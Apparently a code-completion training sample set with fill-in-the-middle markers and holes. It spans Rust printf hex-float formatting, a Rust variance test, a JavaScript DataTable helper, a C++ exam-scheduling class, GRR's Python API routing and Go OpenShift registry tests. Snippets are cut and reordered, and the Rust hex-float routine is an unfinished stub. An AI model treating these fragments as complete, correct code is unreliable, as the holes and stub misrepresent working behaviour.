-> Option<FormatPrimitive> {
let second_field = field.second_field.unwrap_or(6) + 1;
let analysis = FloatAnalysis::analyze(&str_in,
inprefix,
Some(second_field as usize),
None,
true);
let f = get_primitive_hex(inprefix,
&str_in[inprefix.offset..],
&analysis,
second_field as usize,
*field.field_char == 'A');
Some(f)
}
fn primitive_to_str(&self, prim: &FormatPrimitive, field: FormatField) -> String {<|fim▁hole|>}
// C99 hex floats have unique requirements among the floating-point subs in
// pretty much every part of building a primitive, from prefix and suffix to
// the need for base conversion (in every other case, input that is not
// decimal must be converted to decimal; here it is the other way around).
// On the todo list is a trait for get_primitive, implemented by each float
// formatter, that can override a default. When that happens we can take the
// parts of get_primitive_dec specific to decimal and spin them out into
// their own functions that can be overridden.
#[allow(unused_variables)]
#[allow(unused_assignments)]
fn get_primitive_hex(inprefix: &InPrefix,
str_in: &str,
analysis: &FloatAnalysis,
last_dec_place: usize,
capitalized: bool)
-> FormatPrimitive {
let mut f: FormatPrimitive = Default::default();
f.prefix = Some(String::from(if inprefix.sign == -1 {
"-0x"
} else {
"0x"
}));
// assign the digits before and after the decimal points
// to separate slices. If no digits after decimal point,
// assign 0
let (mut first_segment_raw, second_segment_raw) = match analysis.decimal_pos {
Some(pos) => (&str_in[..pos], &str_in[pos + 1..]),
None => (&str_in[..], "0"),
};
if first_segment_raw.len() == 0 {
first_segment_raw = "0";
}
// convert to string, hexifying if input is in dec.
// let (first_segment, second_segment) =
// match inprefix.radix_in {
// Base::Ten => {
// (to_hex(first_segment_raw, true),
// to_hex(second_segment_raw, false))
// }
// _ => {
// (String::from(first_segment_raw),
// String::from(second_segment_raw))
// }
// };
//
//
// f.pre_decimal = Some(first_segment);
// f.post_decimal = Some(second_segment);
//
// TODO actual conversion, make sure to get back mantissa.
// for hex to hex, it's really just a matter of moving the
// decimal point and calculating the mantissa by its initial
// position and its moves, with every position counting for
// the addition or subtraction of 4 (2**4, because 4 bits in a hex digit)
// to the exponent.
// decimal's going to be a little more complicated. correct simulation
    // of glibc will require after-decimal division to a specified precision.
// the difficult part of this (arrnum_int_div_step) is already implemented.
// the hex float name may be a bit misleading in terms of how to go about the
// conversion. The best way to do it is to just convert the floatnum
// directly to base 2 and then at the end translate back to hex.
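    // Illustrative example (hypothetical input): 0x1A.8 can be normalized by
    // moving the hex point one digit left, which adds 4 to the binary
    // exponent: 0x1A.8 == 0x1.A8 * 2^4, printed as "0x1.a8p+4".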
let mantissa = 0;
f.suffix = Some({
let ind = if capitalized {
"P"
} else {
"p"
};
if mantissa >= 0 {
format!("{}+{}", ind, mantissa)
} else {
format!("{}{}", ind, mantissa)
}
});
f
}
fn to_hex(src: &str, before_decimal: bool) -> String {
let rten = base_conv::RadixTen;
let rhex = base_conv::RadixHex;
if before_decimal {
base_conv::base_conv_str(src, &rten, &rhex)
} else {
let as_arrnum_ten = base_conv::str_to_arrnum(src, &rten);
let s = format!("{}",
base_conv::base_conv_float(&as_arrnum_ten, rten.get_max(), rhex.get_max()));
if s.len() > 2 {
String::from(&s[2..])
} else {
// zero
s
}
}
}<|fim▁end|>
|
primitive_to_str_common(prim, &field)
}
|
<|file_name|>regions-variance-covariant-use-covariant.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that a type which is covariant with respect to its region
// parameter is successful when used in a covariant way.
//<|fim▁hole|>// check that the variance inference works in the first place.
// This is covariant with respect to 'a, meaning that
// Covariant<'foo> <: Covariant<'static> because
// 'foo <= 'static
// pretty-expanded FIXME #23616
struct Covariant<'a> {
f: extern "Rust" fn(&'a isize)
}
fn use_<'a>(c: Covariant<'a>) {
// OK Because Covariant<'a> <: Covariant<'static> iff 'a <= 'static
let _: Covariant<'static> = c;
}
pub fn main() {}<|fim▁end|>
|
// Note: see compile-fail/variance-regions-*.rs for the tests that
|
<|file_name|>osis_datatable.js<|end_file_name|><|fim▁begin|>function initializeDataTable(formId, tableId, storageKey, pageNumber, itemsPerPage, ajaxUrl, columnDefs, extra){
let domTable = $('#' + tableId);
let options = {
'createdRow': function (row, data, dataIndex) {
let url = "";
if (data['osis_url']) {
url = data['osis_url'];
} else {
url = data['url'];
}
$(row).attr('data-id', url);
$(row).attr('data-value', data['acronym']);
},
columnDefs: columnDefs,
"stateSave": true,
"paging" : false,
"ordering" : true,
"orderMulti": false,
"order": [[1, 'asc']],
"serverSide": true,
"ajax" : {
"url": ajaxUrl,
"accepts": {
json: 'application/json'
},
"type": "GET",
"dataSrc": "object_list",
"data": function (d){
let querystring = getDataAjaxTable(formId, domTable, d, pageNumber);
querystring["paginator_size"] = itemsPerPage;
return querystring;
},
"traditional": true
},<|fim▁hole|> "oAria": {
"sSortAscending": gettext("activate to sort column ascending"),
"sSortDescending": gettext("activate to sort column descending")
}
}
};
return domTable.DataTable($.extend(true, {}, options, extra));
}
function outputAnchorOuterHtml(urlPath, textContent){
const anchor = document.createElement("a");
anchor.setAttribute("href", urlPath);
anchor.textContent = textContent;
return anchor.outerHTML;
}<|fim▁end|>
|
"info" : false,
"searching" : false,
'processing': false,
"language": {
|
<|file_name|>Student.cpp<|end_file_name|><|fim▁begin|>//
// Student.cpp
// HorairesExams
//
// Created by Quentin Peter on 19.11.13.
// Copyright (c) 2013 Quentin. All rights reserved.
//
#include "Student.h"
#include "Examen.h"
Student::Student(string name, string email, int sciper): a_name(name),a_email(email),a_sciper(sciper){}
string Student::name() const{
return a_name;
}<|fim▁hole|>string Student::eMail(){
return a_email;
}
int Student::sciper(){
return a_sciper;
}
bool Student::addExam(Date date,Time time, Examen* ptrExa){
return a_timeTable.addOnDateAndTime(ptrExa, date, time);
}
void Student::addExam(Date date, Examen* ptr){
a_timeTable.addOnDate(ptr, date);
}
bool Student::fixeExam(Date date,Time time, Examen* ptrExa, int minDist){
return a_timeTable.addOnDateFarFrom(ptrExa, date, time , minDist);
}
vector<int> Student::nbrExamenDate(vector<Date> listDate){
vector<int> retour;
for (int i(0); i<listDate.size(); i++) {
retour.push_back(a_timeTable.numberObjectsOnDate(listDate[i]));
}
return retour;
}
int Student::calculerScore(){
    // Compute the distance between consecutive exam dates. If a date holds several exams, fetch their time slots and score them.
int score(0);
    Date precedant(a_timeTable.begin()->first);// Start from the first date
for (auto it(a_timeTable.begin()); it!= a_timeTable.end(); it++) {
        // Count the number of days since the previous exam
int distanceJours(Date::distance(precedant, it->first));
        if (distanceJours<3) {// Past three days the score becomes stable
score+=distanceJours;
}
else{
score+=3;
}
precedant=it->first;
        // Now make sure there are not too many exams on the same day
int nombreExamen(it->second->nombreElement());
if (nombreExamen>2) {
            score-=10000;// Kill the score if there are more than two exams; this should not happen
}
else if (nombreExamen==2){
score-=1000;
            // With two exams we need their times
vector<Time> heures(it->second->getTime());
if (heures.size()==2) {
int distanceHeure (Time::distance(heures[0], heures[1]));
                // Less than two hours apart means the student cannot reach the other exam
if (distanceHeure<2*60) {
score-=10000;
}
else if (distanceHeure<4*60){
                // Less than 4 hours apart costs 10 points
score-=10;
}
else if (distanceHeure<6*60){
score -=8;
}
else{
score-=5;
}
}
else{
cout << "Le score est calculé pour des exas non fixés" <<endl;
}
}
}
return score;
}
Student* Student::newStudent(){
return new Student(a_name,a_email,a_sciper);
}
void Student::afficher(ofstream& fSave){
fSave<<a_name<<endl;
fSave<<a_email<<endl<<endl;
for (auto it(a_timeTable.begin()); it!=a_timeTable.end(); it++) {
fSave<<endl<<"\t "<<it->first<<endl<<endl;
        fSave<<*(it->second);// No endl: each name already ends with one
}
}<|fim▁end|>
| |
<|file_name|>http_api.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""HTTP API logic that ties API call renderers with HTTP routes."""
import json
from django import http
from werkzeug import exceptions as werkzeug_exceptions
from werkzeug import routing
import logging
from grr.gui import api_call_renderers
from grr.lib import access_control
from grr.lib import rdfvalue
from grr.lib import registry
def BuildToken(request, execution_time):
"""Build an ACLToken from the request."""
if request.method == "GET":
reason = request.GET.get("reason", "")
elif request.method == "POST":
reason = request.POST.get("reason", "")
token = access_control.ACLToken(
username=request.user,
reason=reason,
process="GRRAdminUI",
expiry=rdfvalue.RDFDatetime().Now() + execution_time)
for field in ["REMOTE_ADDR", "HTTP_X_FORWARDED_FOR"]:
remote_addr = request.META.get(field, "")
if remote_addr:
token.source_ips.append(remote_addr)
return token
HTTP_ROUTING_MAP = routing.Map()
def RegisterHttpRouteHandler(method, route, renderer_cls):
"""Registers given ApiCallRenderer for given method and route."""
HTTP_ROUTING_MAP.add(routing.Rule(
route, methods=[method],
endpoint=renderer_cls))
def GetRendererForHttpRequest(request):
"""Returns a renderer to handle given HTTP request."""
matcher = HTTP_ROUTING_MAP.bind("%s:%s" % (request.environ["SERVER_NAME"],
request.environ["SERVER_PORT"]))
try:
match = matcher.match(request.path, request.method)
except werkzeug_exceptions.NotFound:
raise api_call_renderers.ApiCallRendererNotFoundError(
"No API renderer was found for (%s) %s" % (request.path,
request.method))
renderer_cls, route_args = match
return (renderer_cls(), route_args)
def FillAdditionalArgsFromRequest(request, supported_types):
"""Creates arguments objects from a given request dictionary."""
results = {}
for key, value in request.items():
try:
request_arg_type, request_attr = key.split(".", 1)
except ValueError:
continue
arg_class = None
for key, supported_type in supported_types.items():
if key == request_arg_type:
arg_class = supported_type
if arg_class:
if request_arg_type not in results:
results[request_arg_type] = arg_class()
results[request_arg_type].Set(request_attr, value)
results_list = []
for name, arg_obj in results.items():
additional_args = rdfvalue.ApiCallAdditionalArgs(
name=name, type=supported_types[name].__name__)
additional_args.args = arg_obj
results_list.append(additional_args)
return results_list
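# Illustrative example (the argument type is hypothetical): a request dict like
#   {"hunt.client_limit": "10"}
# with supported_types={"hunt": ApiHuntArgs} yields one ApiCallAdditionalArgs
# with name="hunt", type="ApiHuntArgs" and args.client_limit set from "10".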
class JSONEncoderWithRDFPrimitivesSupport(json.JSONEncoder):
"""Custom JSON encoder that encodes renderers output.
Custom encoder is required to facilitate usage of primitive values -
booleans, integers and strings - in renderers responses.
  If a renderer references an RDFString, RDFInteger or an RDFBool when building
  a response, it will lead to a JSON encoding failure when the response is
  encoded,
unless this custom encoder is used. Another way to solve this issue would be
to explicitly call api_value_renderers.RenderValue on every value returned
from the renderer, but it will make the code look overly verbose and dirty.
"""
def default(self, obj):
if isinstance(obj, (rdfvalue.RDFInteger,
rdfvalue.RDFBool,
rdfvalue.RDFString)):
return obj.SerializeToDataStore()
return json.JSONEncoder.default(self, obj)
def BuildResponse(status, rendered_data):
"""Builds HTTPResponse object from rendered data and HTTP status."""<|fim▁hole|> cls=JSONEncoderWithRDFPrimitivesSupport))
return response
def RenderHttpResponse(request):
"""Handles given HTTP request with one of the available API renderers."""
renderer, route_args = GetRendererForHttpRequest(request)
if request.method == "GET":
if renderer.args_type:
unprocessed_request = request.GET
if hasattr(unprocessed_request, "dict"):
unprocessed_request = unprocessed_request.dict()
args = renderer.args_type()
for type_info in args.type_infos:
if type_info.name in route_args:
args.Set(type_info.name, route_args[type_info.name])
elif type_info.name in unprocessed_request:
args.Set(type_info.name, unprocessed_request[type_info.name])
if renderer.additional_args_types:
if not hasattr(args, "additional_args"):
raise RuntimeError("Renderer %s defines additional arguments types "
"but its arguments object does not have "
"'additional_args' field." % renderer)
if hasattr(renderer.additional_args_types, "__call__"):
additional_args_types = renderer.additional_args_types()
else:
additional_args_types = renderer.additional_args_types
args.additional_args = FillAdditionalArgsFromRequest(
unprocessed_request, additional_args_types)
else:
args = None
elif request.method == "POST":
try:
payload = json.loads(request.body)
args = renderer.args_type(**payload)
except Exception as e: # pylint: disable=broad-except
response = http.HttpResponse(status=500)
response.write(")]}'\n") # XSSI protection
response.write(json.dumps(dict(message=str(e))))
logging.exception(
"Error while parsing POST request %s (%s): %s",
request.path, request.method, e)
return response
else:
raise RuntimeError("Unsupported method: %s." % request.method)
token = BuildToken(request, renderer.max_execution_time)
try:
rendered_data = api_call_renderers.HandleApiCall(renderer, args,
token=token)
return BuildResponse(200, rendered_data)
except Exception as e: # pylint: disable=broad-except
logging.exception(
"Error while processing %s (%s) with %s: %s", request.path,
request.method, renderer.__class__.__name__, e)
return BuildResponse(500, dict(message=str(e)))
class HttpApiInitHook(registry.InitHook):
"""Register HTTP API renderers."""
def RunOnce(self):
# Doing late import to avoid circular dependency (http_api.py is referenced
# by api_plugins/docs.py).
#
# pylint: disable=g-import-not-at-top
from grr.gui import api_plugins
# pylint: enable=g-import-not-at-top
# The list is alphabetized by route.
RegisterHttpRouteHandler("GET", "/api/aff4/<path:aff4_path>",
api_plugins.aff4.ApiAff4Renderer)
RegisterHttpRouteHandler("GET", "/api/aff4-index/<path:aff4_path>",
api_plugins.aff4.ApiAff4IndexRenderer)
RegisterHttpRouteHandler("GET", "/api/artifacts",
api_plugins.artifact.ApiArtifactRenderer)
RegisterHttpRouteHandler("GET", "/api/clients",
api_plugins.client.ApiClientSearchRenderer)
RegisterHttpRouteHandler("GET", "/api/clients/<client_id>",
api_plugins.client.ApiClientSummaryRenderer)
RegisterHttpRouteHandler("GET", "/api/clients/labels",
api_plugins.client.ApiClientsLabelsListRenderer)
RegisterHttpRouteHandler("POST", "/api/clients/labels/add",
api_plugins.client.ApiClientsAddLabelsRenderer)
RegisterHttpRouteHandler("POST", "/api/clients/labels/remove",
api_plugins.client.ApiClientsRemoveLabelsRenderer)
RegisterHttpRouteHandler("GET", "/api/config",
api_plugins.config.ApiConfigRenderer)
RegisterHttpRouteHandler("GET", "/api/docs",
api_plugins.docs.ApiDocsRenderer)
RegisterHttpRouteHandler("GET", "/api/flows/<client_id>/<flow_id>/status",
api_plugins.client.ApiFlowStatusRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts",
api_plugins.hunt.ApiHuntsListRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>",
api_plugins.hunt.ApiHuntSummaryRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>/errors",
api_plugins.hunt.ApiHuntErrorsRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>/log",
api_plugins.hunt.ApiHuntLogRenderer)
RegisterHttpRouteHandler(
"GET", "/api/reflection/rdfvalue/<type>",
api_plugins.reflection.ApiRDFValueReflectionRenderer)
RegisterHttpRouteHandler(
"GET", "/api/reflection/rdfvalue/all",
api_plugins.reflection.ApiAllRDFValuesReflectionRenderer)
RegisterHttpRouteHandler(
"GET", "/api/stats/store/<component>/metadata",
api_plugins.stats.ApiStatsStoreMetricsMetadataRenderer)
RegisterHttpRouteHandler(
"GET", "/api/stats/store/<component>/metrics/<metric_name>",
api_plugins.stats.ApiStatsStoreMetricRenderer)
RegisterHttpRouteHandler("GET", "/api/users/me/settings",
api_plugins.user.ApiUserSettingsRenderer)
RegisterHttpRouteHandler("POST", "/api/users/me/settings",
api_plugins.user.ApiSetUserSettingsRenderer)<|fim▁end|>
|
response = http.HttpResponse(status=status, content_type="application/json")
response.write(")]}'\n") # XSSI protection
response.write(json.dumps(rendered_data,
|
<|file_name|>test_saferef.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from celery.utils.dispatch.saferef import safe_ref
from celery.tests.utils import Case
class Class1(object):
def x(self):
pass
def fun(obj):
pass
class Class2(object):
def __call__(self, obj):
pass
class SaferefTests(Case):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Class1()
ts.append(t)
s = safe_ref(t.x, self._closure)
ss.append(s)
ts.append(fun)
ss.append(safe_ref(fun, self._closure))
for x in xrange(30):
t = Class2()
ts.append(t)
s = safe_ref(t, self._closure)
ss.append(s)
self.ts = ts
self.ss = ss<|fim▁hole|> self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safe_ref(t.x) in self.ss)
def testValid(self):
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertIn(safe_ref(t.x), sd)
else:
self.assertIn(safe_ref(t), sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1<|fim▁end|>
| |
<|file_name|>rest_test.go<|end_file_name|><|fim▁begin|>package imagestreammapping
import (
"fmt"
"net/http"
"reflect"
"strings"
"testing"
etcd "github.com/coreos/etcd/clientv3"
"golang.org/x/net/context"
"k8s.io/apimachinery/pkg/api/errors"
metainternal "k8s.io/apimachinery/pkg/apis/meta/internalversion"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/apiserver/pkg/authentication/user"
apirequest "k8s.io/apiserver/pkg/endpoints/request"
"k8s.io/apiserver/pkg/storage/etcd/etcdtest"
etcdtesting "k8s.io/apiserver/pkg/storage/etcd/testing"
kapi "k8s.io/kubernetes/pkg/api"
"k8s.io/kubernetes/pkg/api/v1"
"k8s.io/kubernetes/pkg/registry/registrytest"
authorizationapi "github.com/openshift/origin/pkg/authorization/apis/authorization"
"github.com/openshift/origin/pkg/authorization/registry/subjectaccessreview"
"github.com/openshift/origin/pkg/image/admission/testutil"
imageapi "github.com/openshift/origin/pkg/image/apis/image"
"github.com/openshift/origin/pkg/image/registry/image"
imageetcd "github.com/openshift/origin/pkg/image/registry/image/etcd"
"github.com/openshift/origin/pkg/image/registry/imagestream"
imagestreametcd "github.com/openshift/origin/pkg/image/registry/imagestream/etcd"
"github.com/openshift/origin/pkg/util/restoptions"
_ "github.com/openshift/origin/pkg/api/install"
)
const testDefaultRegistryURL = "defaultregistry:5000"
var testDefaultRegistry = imageapi.DefaultRegistryFunc(func() (string, bool) { return testDefaultRegistryURL, true })
type fakeSubjectAccessReviewRegistry struct {
}
var _ subjectaccessreview.Registry = &fakeSubjectAccessReviewRegistry{}
func (f *fakeSubjectAccessReviewRegistry) CreateSubjectAccessReview(ctx apirequest.Context, subjectAccessReview *authorizationapi.SubjectAccessReview) (*authorizationapi.SubjectAccessReviewResponse, error) {
return nil, nil
}
func setup(t *testing.T) (etcd.KV, *etcdtesting.EtcdTestServer, *REST) {
etcdStorage, server := registrytest.NewEtcdStorage(t, "")
etcdClient := etcd.NewKV(server.V3Client)
imageStorage, err := imageetcd.NewREST(restoptions.NewSimpleGetter(etcdStorage))
if err != nil {
t.Fatal(err)
}
imageStreamStorage, imageStreamStatus, internalStorage, err := imagestreametcd.NewREST(restoptions.NewSimpleGetter(etcdStorage), testDefaultRegistry, &fakeSubjectAccessReviewRegistry{}, &testutil.FakeImageStreamLimitVerifier{})
if err != nil {
t.Fatal(err)
}
imageRegistry := image.NewRegistry(imageStorage)
imageStreamRegistry := imagestream.NewRegistry(imageStreamStorage, imageStreamStatus, internalStorage)
storage := NewREST(imageRegistry, imageStreamRegistry, testDefaultRegistry)
return etcdClient, server, storage
}
func validImageStream() *imageapi.ImageStream {
return &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "test",
},
}
}
const testImageID = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
func validNewMappingWithName() *imageapi.ImageStreamMapping {
return &imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "somerepo",
},
Image: imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: testImageID,
Annotations: map[string]string{imageapi.ManagedByOpenShiftAnnotation: "true"},
},
DockerImageReference: "localhost:5000/default/somerepo@" + testImageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
},
Tag: "latest",
}
}
func TestCreateConflictingNamespace(t *testing.T) {
_, server, storage := setup(t)
defer server.Terminate(t)
mapping := validNewMappingWithName()
mapping.Namespace = "some-value"
ch, err := storage.Create(apirequest.WithNamespace(apirequest.NewContext(), "legal-name"), mapping)
if ch != nil {
t.Error("Expected a nil obj, but we got a value")
}
expectedError := "the namespace of the provided object does not match the namespace sent on the request"
if err == nil {
t.Fatalf("Expected '" + expectedError + "', but we didn't get one")
}
if !strings.Contains(err.Error(), expectedError) {
t.Errorf("Expected '"+expectedError+"' error, got '%v'", err.Error())
}
}
func TestCreateImageStreamNotFoundWithName(t *testing.T) {
_, server, storage := setup(t)
defer server.Terminate(t)
obj, err := storage.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if obj != nil {
t.Errorf("Unexpected non-nil obj %#v", obj)
}
if err == nil {
t.Fatal("Unexpected nil err")
}
e, ok := err.(*errors.StatusError)
if !ok {
t.Fatalf("expected StatusError, got %#v", err)
}
if e, a := http.StatusNotFound, e.ErrStatus.Code; int32(e) != a {
t.Errorf("error status code: expected %d, got %d", e, a)
}
if e, a := "imagestreams", e.ErrStatus.Details.Kind; e != a {
t.Errorf("error status details kind: expected %s, got %s", e, a)
}
if e, a := "somerepo", e.ErrStatus.Details.Name; e != a {
t.Errorf("error status details name: expected %s, got %s", e, a)
}
}
func TestCreateSuccessWithName(t *testing.T) {
client, server, storage := setup(t)
defer server.Terminate(t)
initialRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{Namespace: "default", Name: "somerepo"},
}
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), initialRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
ctx := apirequest.WithUser(apirequest.NewDefaultContext(), &user.DefaultInfo{})
mapping := validNewMappingWithName()
_, err = storage.Create(ctx, mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %#v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, testImageID, &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "somerepo", &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected non-nil err: %#v", err)
}
if e, a := testImageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageWithNewTag(t *testing.T) {
imageID := "sha256:8d812da98d6dd61620343f1a5bf6585b34ad6ed16e5c5f7c7216a525d6aeb772"
existingRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
Namespace: "default",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/default/somerepo",
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"existingTag": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/somens/somerepo@" + imageID}}},
},
},
}
existingImage := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: imageID,
},
DockerImageReference: "localhost:5000/somens/somerepo@" + imageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/"+imageID), runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
},
Image: *existingImage,
Tag: "latest",
}
ctx := apirequest.NewDefaultContext()
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Errorf("Unexpected error creating image stream mapping%v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, imageID, &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "somerepo", &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected non-nil err: %#v", err)
}
if e, a := imageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
tagEvent := imageapi.LatestTaggedImage(repo, "latest")
if e, a := image.DockerImageReference, tagEvent.DockerImageReference; e != a {
t.Errorf("Unexpected tracking dockerImageReference: %q != %q", a, e)
}
pullSpec, ok := imageapi.ResolveLatestTaggedImage(repo, "latest")
if !ok {
t.Fatalf("Failed to resolv latest tagged image")
}
if e, a := image.DockerImageReference, pullSpec; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageOverridingDockerImageReference(t *testing.T) {
imageID := "sha256:8d812da98d6dd61620343f1a5bf6585b34ad6ed16e5c5f7c7216a525d6aeb772"
newRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "newrepo",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/default/newrepo",
},
Status: imageapi.ImageStreamStatus{
DockerImageRepository: "localhost:5000/default/newrepo",
},
}
existingImage := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: imageID,<|fim▁hole|> },
DockerImageReference: "localhost:5000/someproject/somerepo@" + imageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/newrepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), newRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/"+imageID), runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Name: "newrepo",
},
Image: *existingImage,
Tag: "latest",
}
ctx := apirequest.NewDefaultContext()
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %#v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, imageID, &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "newrepo", &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected non-nil err: %#v", err)
}
if e, a := imageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
tagEvent := imageapi.LatestTaggedImage(repo, "latest")
if e, a := testDefaultRegistryURL+"/default/newrepo@"+imageID, tagEvent.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if tagEvent.DockerImageReference == image.DockerImageReference {
t.Errorf("Expected image stream to have dockerImageReference other than %q", image.DockerImageReference)
}
pullSpec, ok := imageapi.ResolveLatestTaggedImage(repo, "latest")
if !ok {
t.Fatalf("Failed to resolv latest tagged image")
}
if e, a := testDefaultRegistryURL+"/default/newrepo@"+imageID, pullSpec; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageAndTag(t *testing.T) {
existingRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
Namespace: "default",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/someproject/somerepo",
/*
Tags: map[string]imageapi.TagReference{
"existingTag": {Tag: "existingTag", Reference: "existingImage"},
},
*/
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"existingTag": {Items: []imageapi.TagEvent{{DockerImageReference: "existingImage"}}},
},
},
}
existingImage := &imageapi.Image{
